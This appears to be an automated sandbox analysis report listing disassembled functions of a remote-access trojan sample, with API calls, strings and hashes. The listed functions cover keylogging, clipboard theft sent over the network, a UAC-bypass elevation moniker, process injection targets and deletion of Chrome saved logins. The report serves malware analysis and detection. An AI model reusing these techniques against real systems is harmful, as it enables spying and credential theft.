                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Close$CreateHandleProcess32$FileFirstModuleNameNextSnapshotToolhelp32Value
                                                  • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe$BG
                                                  • API String ID: 726551946-3025026198
                                                  • Opcode ID: 2298112d5e9beca4c64cadb89c7e546d0899f31810f4b1b50fdabc55d78eae7e
                                                  • Instruction ID: ae31f71cb8b9f969ca9e83e5ca698076ed3bac053ed440982de07d1dc4d90588
                                                  • Opcode Fuzzy Hash: 2298112d5e9beca4c64cadb89c7e546d0899f31810f4b1b50fdabc55d78eae7e
                                                  • Instruction Fuzzy Hash: ED7172311083019BC714FB61D8519EF77A5BF91358F400D3EF986631E2EF38A959CA9A
                                                  Function 004159C6 Relevance: 18.1, APIs: 12, Instructions: 80clipboardmemoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • OpenClipboard.USER32 ref: 004159C7
                                                  • EmptyClipboard.USER32 ref: 004159D5
                                                  • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 004159F5
                                                  • GlobalLock.KERNEL32(00000000), ref: 004159FE
                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00415A34
                                                  • SetClipboardData.USER32(0000000D,00000000), ref: 00415A3D
                                                  • CloseClipboard.USER32 ref: 00415A5A
                                                  • OpenClipboard.USER32 ref: 00415A61
                                                  • GetClipboardData.USER32(0000000D), ref: 00415A71
                                                  • GlobalLock.KERNEL32(00000000), ref: 00415A7A
                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00415A83
                                                  • CloseClipboard.USER32 ref: 00415A89
                                                    • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                                  • String ID:
                                                  • API String ID: 3520204547-0
                                                  • Opcode ID: 5bf6c0a188ebc9cd77caef7c6d8a55023eea9b799c8747cd0bf31199529283f8
                                                  • Instruction ID: b8e523df9fc7c7245f85f50a48877f09888e29e8b5459684195c928b546a98bf
                                                  • Opcode Fuzzy Hash: 5bf6c0a188ebc9cd77caef7c6d8a55023eea9b799c8747cd0bf31199529283f8
                                                  • Instruction Fuzzy Hash: E02183712043009BC714BBB1EC5AAAE76A9AF80752F00453EFD06961E2EF38C845D66A
                                                  Function 0210CD05 Relevance: 18.1, APIs: 12, Instructions: 73windownativeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • NtdllDefWindowProc_A.NTDLL(?,00000401,?,?), ref: 0210CD50
                                                  • GetCursorPos.USER32(?), ref: 0210CD5F
                                                  • SetForegroundWindow.USER32(?), ref: 0210CD68
                                                  • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0210CD82
                                                  • Shell_NotifyIcon.SHELL32(00000002,00473B50), ref: 0210CDD3
                                                  • ExitProcess.KERNEL32 ref: 0210CDDB
                                                  • CreatePopupMenu.USER32 ref: 0210CDE1
                                                  • AppendMenuA.USER32(00000000,00000000,00000000,0046C11C), ref: 0210CDF6
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyNtdllProc_ProcessShell_Track
                                                  • String ID:
                                                  • API String ID: 1665278180-0
                                                  • Opcode ID: 17791859dac929b483a24ff72816a8478769eebc5405c417f6cbcdd658e3cffe
                                                  • Instruction ID: dcfcda078f8b611041f2c0a0c358ecbe83ef891394394bf764188e4d4bdfa802
                                                  • Opcode Fuzzy Hash: 17791859dac929b483a24ff72816a8478769eebc5405c417f6cbcdd658e3cffe
                                                  • Instruction Fuzzy Hash: BE210C3114420AFFDB195F64ED4EAAA3F75EB04302F004235B906A40B2D7B6DA61EF98
                                                  Function 00418754 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 197COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 0$1$2$3$4$5$6$7
                                                  • API String ID: 0-3177665633
                                                  • Opcode ID: cde1b3d257b3b84ac0aca3a867a652d949c29c2e455d7912b36e5a4a136b74f3
                                                  • Instruction ID: 2879f211a781d1662389055333b9a248a4bc7621c6500268a6892da51c348380
                                                  • Opcode Fuzzy Hash: cde1b3d257b3b84ac0aca3a867a652d949c29c2e455d7912b36e5a4a136b74f3
                                                  • Instruction Fuzzy Hash: CC61A370508301AEDB00EF21D862FEA77E4AF85754F40485EFA91672E1DF789A48C797
                                                  Function 00409B10 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 108keyboardthreadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetForegroundWindow.USER32 ref: 00409B3F
                                                  • GetWindowThreadProcessId.USER32(00000000,?), ref: 00409B4B
                                                  • GetKeyboardLayout.USER32(00000000), ref: 00409B52
                                                  • GetKeyState.USER32(00000010), ref: 00409B5C
                                                  • GetKeyboardState.USER32(?), ref: 00409B67
                                                  • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00409B8A
                                                  • ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 00409BE3
                                                  • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00409C1C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                                  • String ID: 8[G
                                                  • API String ID: 1888522110-1691237782
                                                  • Opcode ID: 0057a6b8e9be89c2a124ace2c7aa15ce6e2280d77a8450e2501583d43799386c
                                                  • Instruction ID: f24a8317de74a0bbad47f265c67a45df51816e9018bfad09e00086f3728f1c27
                                                  • Opcode Fuzzy Hash: 0057a6b8e9be89c2a124ace2c7aa15ce6e2280d77a8450e2501583d43799386c
                                                  • Instruction Fuzzy Hash: EE318172508309AFD700DF90DC85FDBB7ECEB48715F00083ABA45961A1D6B5E948DB96
                                                  Function 00406764 Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 55COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _wcslen.LIBCMT ref: 00406788
                                                  • CoGetObject.OLE32(?,00000024,004659B0,00000000), ref: 004067E9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Object_wcslen
                                                  • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                                  • API String ID: 240030777-3166923314
                                                  • Opcode ID: db32128b02a1ccbc70c4588b7822f6c775a314ba91b6364ff21a4127614396bf
                                                  • Instruction ID: dba8c49f7cecafb8ed31af17d29d910bb03d3c12ecd117c8e18c4d6c9c114880
                                                  • Opcode Fuzzy Hash: db32128b02a1ccbc70c4588b7822f6c775a314ba91b6364ff21a4127614396bf
                                                  • Instruction Fuzzy Hash: 811170B2901118AEDB10FAA5884AA9EB7BCDB48714F55007FE905F3281E7789A148A7D
                                                  Function 004198C2 Relevance: 15.2, APIs: 10, Instructions: 228serviceCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004748F8), ref: 004198D8
                                                  • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 00419927
                                                  • GetLastError.KERNEL32 ref: 00419935
                                                  • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041996D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                                  • String ID:
                                                  • API String ID: 3587775597-0
                                                  • Opcode ID: 46cfc2a1174990e4b59b9ee5729c715e61cf9958b22909a5f2789daa8df81af0
                                                  • Instruction ID: 5304d2aa3016a1bb8b693e548c532b43deb082133906afc562c92feca393f19d
                                                  • Opcode Fuzzy Hash: 46cfc2a1174990e4b59b9ee5729c715e61cf9958b22909a5f2789daa8df81af0
                                                  • Instruction Fuzzy Hash: 37812F711083049BC614FB21DC959AFB7A8BF94718F50493EF582521E2EF78AA05CB9A
                                                  Function 02109B29 Relevance: 15.2, APIs: 10, Instructions: 228serviceCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004748F8), ref: 02109B3F
                                                  • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 02109B8E
                                                  • GetLastError.KERNEL32 ref: 02109B9C
                                                  • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 02109BD4
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                                  • String ID:
                                                  • API String ID: 3587775597-0
                                                  • Opcode ID: e61e99f355a85b792043c415c774071641b882a3dc166781f1924c38db1b4eec
                                                  • Instruction ID: 7be8a089f96354f15ba5491deaa924116f8f8fb8aa58b0f3fb49a082cfbb573f
                                                  • Opcode Fuzzy Hash: e61e99f355a85b792043c415c774071641b882a3dc166781f1924c38db1b4eec
                                                  • Instruction Fuzzy Hash: ED815032148344AFC754EB20D890EAFB7A9FF94714F10482DFA8286591EF74EA04DF92
                                                  Function 004513B7 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 188COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
                                                    • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                    • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
                                                    • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                    • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446F1E
                                                    • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F2B
                                                  • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 004514C3
                                                  • IsValidCodePage.KERNEL32(00000000), ref: 0045151E
                                                  • IsValidLocale.KERNEL32(?,00000001), ref: 0045152D
                                                  • GetLocaleInfoW.KERNEL32(?,00001001,<D,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 00451575
                                                  • GetLocaleInfoW.KERNEL32(?,00001002,00000000,00000040), ref: 00451594
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                  • String ID: <D$<D$<D
                                                  • API String ID: 745075371-3495170934
                                                  • Opcode ID: 5c8e94395c66df2641350def7a129c2a5847567c9c00908226c609ff7e549d11
                                                  • Instruction ID: fdda48fcf8ef828b158f806230e01f9d82b9b72a6df542884d0e4dc3e0683d2c
                                                  • Opcode Fuzzy Hash: 5c8e94395c66df2641350def7a129c2a5847567c9c00908226c609ff7e549d11
                                                  • Instruction Fuzzy Hash: 5A51D571900205ABEF10EFA5CC40BBF73B8AF05702F14056BFD11EB262E7789A488769
                                                  Function 004099E4 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 65windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 00409A01
                                                  • SetWindowsHookExA.USER32(0000000D,004099D0,00000000), ref: 00409A0F
                                                  • GetLastError.KERNEL32 ref: 00409A1B
                                                    • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                  • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00409A6B
                                                  • TranslateMessage.USER32(?), ref: 00409A7A
                                                  • DispatchMessageA.USER32(?), ref: 00409A85
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                                  • String ID: Keylogger initialization failure: error $`#v
                                                  • API String ID: 3219506041-3226811161
                                                  • Opcode ID: 75b595b8bd9fc6c0a3da4d9f6d32b4c9d6d07c68870121a9c911e84995fb2059
                                                  • Instruction ID: 76b292cdb4e6355f9a4176d1f10d626d2d11be3de55f9aee7ae49bf60faff0c2
                                                  • Opcode Fuzzy Hash: 75b595b8bd9fc6c0a3da4d9f6d32b4c9d6d07c68870121a9c911e84995fb2059
                                                  • Instruction Fuzzy Hash: 201194716043015BC710AB7AAC4996B77ECAB94B15B10057FFC45D2291FB34DE01CBAB
                                                  Function 0041B42F Relevance: 13.6, APIs: 9, Instructions: 105fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B489
                                                  • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B4BB
                                                  • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B529
                                                  • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B536
                                                    • Part of subcall function 0041B42F: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B50C
                                                  • FindClose.KERNEL32(00000000,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B561
                                                  • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B568
                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,00473EE8,00000000), ref: 0041B570
                                                  • FindClose.KERNEL32(00000000,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B583
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                                  • String ID:
                                                  • API String ID: 2341273852-0
                                                  • Opcode ID: 38605e05b284b3287545d71b9912fe11a1e5e192bb535f2a18b99cb8ec032d5d
                                                  • Instruction ID: e81c2b0307560c21eb772b723951cbad4d8c7a866ea933437d0d5d39764c0eb1
                                                  • Opcode Fuzzy Hash: 38605e05b284b3287545d71b9912fe11a1e5e192bb535f2a18b99cb8ec032d5d
                                                  • Instruction Fuzzy Hash: 0031627184921CAACB20D7B1AC89ADA77BCAF04309F4405EBF505D3181EB799AC5CE69
                                                  Function 0210B696 Relevance: 13.6, APIs: 9, Instructions: 105fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • FindFirstFileW.KERNEL32(?,?), ref: 0210B6F0
                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 0210B722
                                                  • SetFileAttributesW.KERNEL32(?,00000080), ref: 0210B790
                                                  • DeleteFileW.KERNEL32(?), ref: 0210B79D
                                                    • Part of subcall function 0210B696: RemoveDirectoryW.KERNEL32(?), ref: 0210B773
                                                  • FindClose.KERNEL32(00000000), ref: 0210B7C8
                                                  • RemoveDirectoryW.KERNEL32(00000000), ref: 0210B7CF
                                                  • GetLastError.KERNEL32 ref: 0210B7D7
                                                  • FindClose.KERNEL32(00000000), ref: 0210B7EA
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                                  • String ID:
                                                  • API String ID: 2341273852-0
                                                  • Opcode ID: 5c62029e558c151831161c7648b51b3c9b0b43d71b7e0bfa42328357c6cc7f75
                                                  • Instruction ID: 498420edff77f04716cb58f055d6ed145b430edce2951149e1fc685b7643ec45
                                                  • Opcode Fuzzy Hash: 5c62029e558c151831161c7648b51b3c9b0b43d71b7e0bfa42328357c6cc7f75
                                                  • Instruction Fuzzy Hash: 1831217288821C9ACB20DBB09C88EDA777CAF45305F4405E9F515D20C1EBB5E799CF65
                                                  Function 00418C69 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 245fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • FindFirstFileW.KERNEL32(00000000,?), ref: 00418EBF
                                                  • FindNextFileW.KERNEL32(00000000,?,?), ref: 00418F8B
                                                    • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,00403AF3,00465324), ref: 0041B633
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$Find$CreateFirstNext
                                                  • String ID: @CG$XCG$`HG$`HG$>G
                                                  • API String ID: 341183262-3780268858
                                                  • Opcode ID: 90ddb27719278e926ac88f6a6e5143ea04e6c7eb9df6eceac141c196bda737cd
                                                  • Instruction ID: 861c71bda04042c44626cba1538e35c757a91b728f0af2478fb4c1063bb13cc5
                                                  • Opcode Fuzzy Hash: 90ddb27719278e926ac88f6a6e5143ea04e6c7eb9df6eceac141c196bda737cd
                                                  • Instruction Fuzzy Hash: B08141315042405BC314FB62C892EEFB3A5AFD1718F50493FF946671E2EF389A49C69A
                                                  Function 020FB59C Relevance: 12.1, APIs: 8, Instructions: 145fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,00465F1C), ref: 020FB61B
                                                  • FindClose.KERNEL32(00000000), ref: 020FB635
                                                  • FindNextFileA.KERNEL32(00000000,?), ref: 020FB758
                                                  • FindClose.KERNEL32(00000000), ref: 020FB77E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Find$CloseFile$FirstNext
                                                  • String ID:
                                                  • API String ID: 1164774033-0
                                                  • Opcode ID: 5b02bdbcf4a37e1aca2b174e4fdcca7b9d7d4ca2704527aaaf21edbe9df3a355
                                                  • Instruction ID: dd655b1859bcc6b2148aff98f99d6e9af2a66ae190d8696f2dacf0326ecf18f2
                                                  • Opcode Fuzzy Hash: 5b02bdbcf4a37e1aca2b174e4fdcca7b9d7d4ca2704527aaaf21edbe9df3a355
                                                  • Instruction Fuzzy Hash: 2A51C531A843095EDB95FB70DC55EEE777ABF10300F1400A9EB05A2891FF306A4ADE95
                                                  Function 00412F45 Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 391registrylibraryloaderCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 0041301A
                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 00413026
                                                    • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                  • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 004131ED
                                                  • GetProcAddress.KERNEL32(00000000), ref: 004131F4
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressCloseCreateLibraryLoadProcsend
                                                  • String ID: SHDeleteKeyW$Shlwapi.dll
                                                  • API String ID: 2127411465-314212984
                                                  • Opcode ID: ed1c84878e10a3618f3fdc0f74b80a3b79f94cb7f05b9c9e9a3083c483f5377f
                                                  • Instruction ID: cc67afc49b78d61a2372e1362dfc4f5d4a672f2d1b5b468e2109e7b1f18a6fb5
                                                  • Opcode Fuzzy Hash: ed1c84878e10a3618f3fdc0f74b80a3b79f94cb7f05b9c9e9a3083c483f5377f
                                                  • Instruction Fuzzy Hash: 4FB1B671A043006BC614BA76CC979BE76989F94718F40063FF946B31E2EF7C9A4486DB
                                                  Function 02108ED0 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 245fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • FindFirstFileW.KERNEL32(00000000,?), ref: 02109126
                                                    • Part of subcall function 0210B881: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,020F3D5A,00465324), ref: 0210B89A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$CreateFindFirst
                                                  • String ID: @CG$XCG$`HG$`HG$>G
                                                  • API String ID: 41799849-3780268858
                                                  • Opcode ID: 370f4d1bb48917f4102406aff739b7f4752134e9ba6bc41bde7cf39fc8db8d8c
                                                  • Instruction ID: de4692da9f5770c0f32582150d19cb19a35fd70219e187b7a477f5f17dcdf39f
                                                  • Opcode Fuzzy Hash: 370f4d1bb48917f4102406aff739b7f4752134e9ba6bc41bde7cf39fc8db8d8c
                                                  • Instruction Fuzzy Hash: 528142315843409FD394FB20D8A1EEF73AAAFE1310F40492DEA56479D5EF309A09DE96
                                                  Function 0040E54F Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 88sleepCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 004124B7: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000), ref: 004124D7
                                                    • Part of subcall function 004124B7: RegQueryValueExA.ADVAPI32(00000000,?,00000000,?,?,?), ref: 004124F5
                                                    • Part of subcall function 004124B7: RegCloseKey.ADVAPI32(00000000), ref: 00412500
                                                  • Sleep.KERNEL32(00000BB8), ref: 0040E603
                                                  • ExitProcess.KERNEL32 ref: 0040E672
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseExitOpenProcessQuerySleepValue
                                                  • String ID: 5.3.0 Pro$override$pth_unenc$BG
                                                  • API String ID: 2281282204-3981147832
                                                  • Opcode ID: 7363293ade3d114f2f1418b73c694814219fbc2a5cb624a3a2a66f84acf92c38
                                                  • Instruction ID: 346becae97c590b24629de205d3f766cc2ad037e5fc603921d36f10068cff0f4
                                                  • Opcode Fuzzy Hash: 7363293ade3d114f2f1418b73c694814219fbc2a5cb624a3a2a66f84acf92c38
                                                  • Instruction Fuzzy Hash: 6B21A131B0030027C608767A891BA6F359A9B91719F90443EF805A76D7EE7D8A6083DF
                                                  Function 0040B21B Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 48fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040B257
                                                  • GetLastError.KERNEL32 ref: 0040B261
                                                  Strings
                                                  • UserProfile, xrefs: 0040B227
                                                  • [Chrome StoredLogins found, cleared!], xrefs: 0040B287
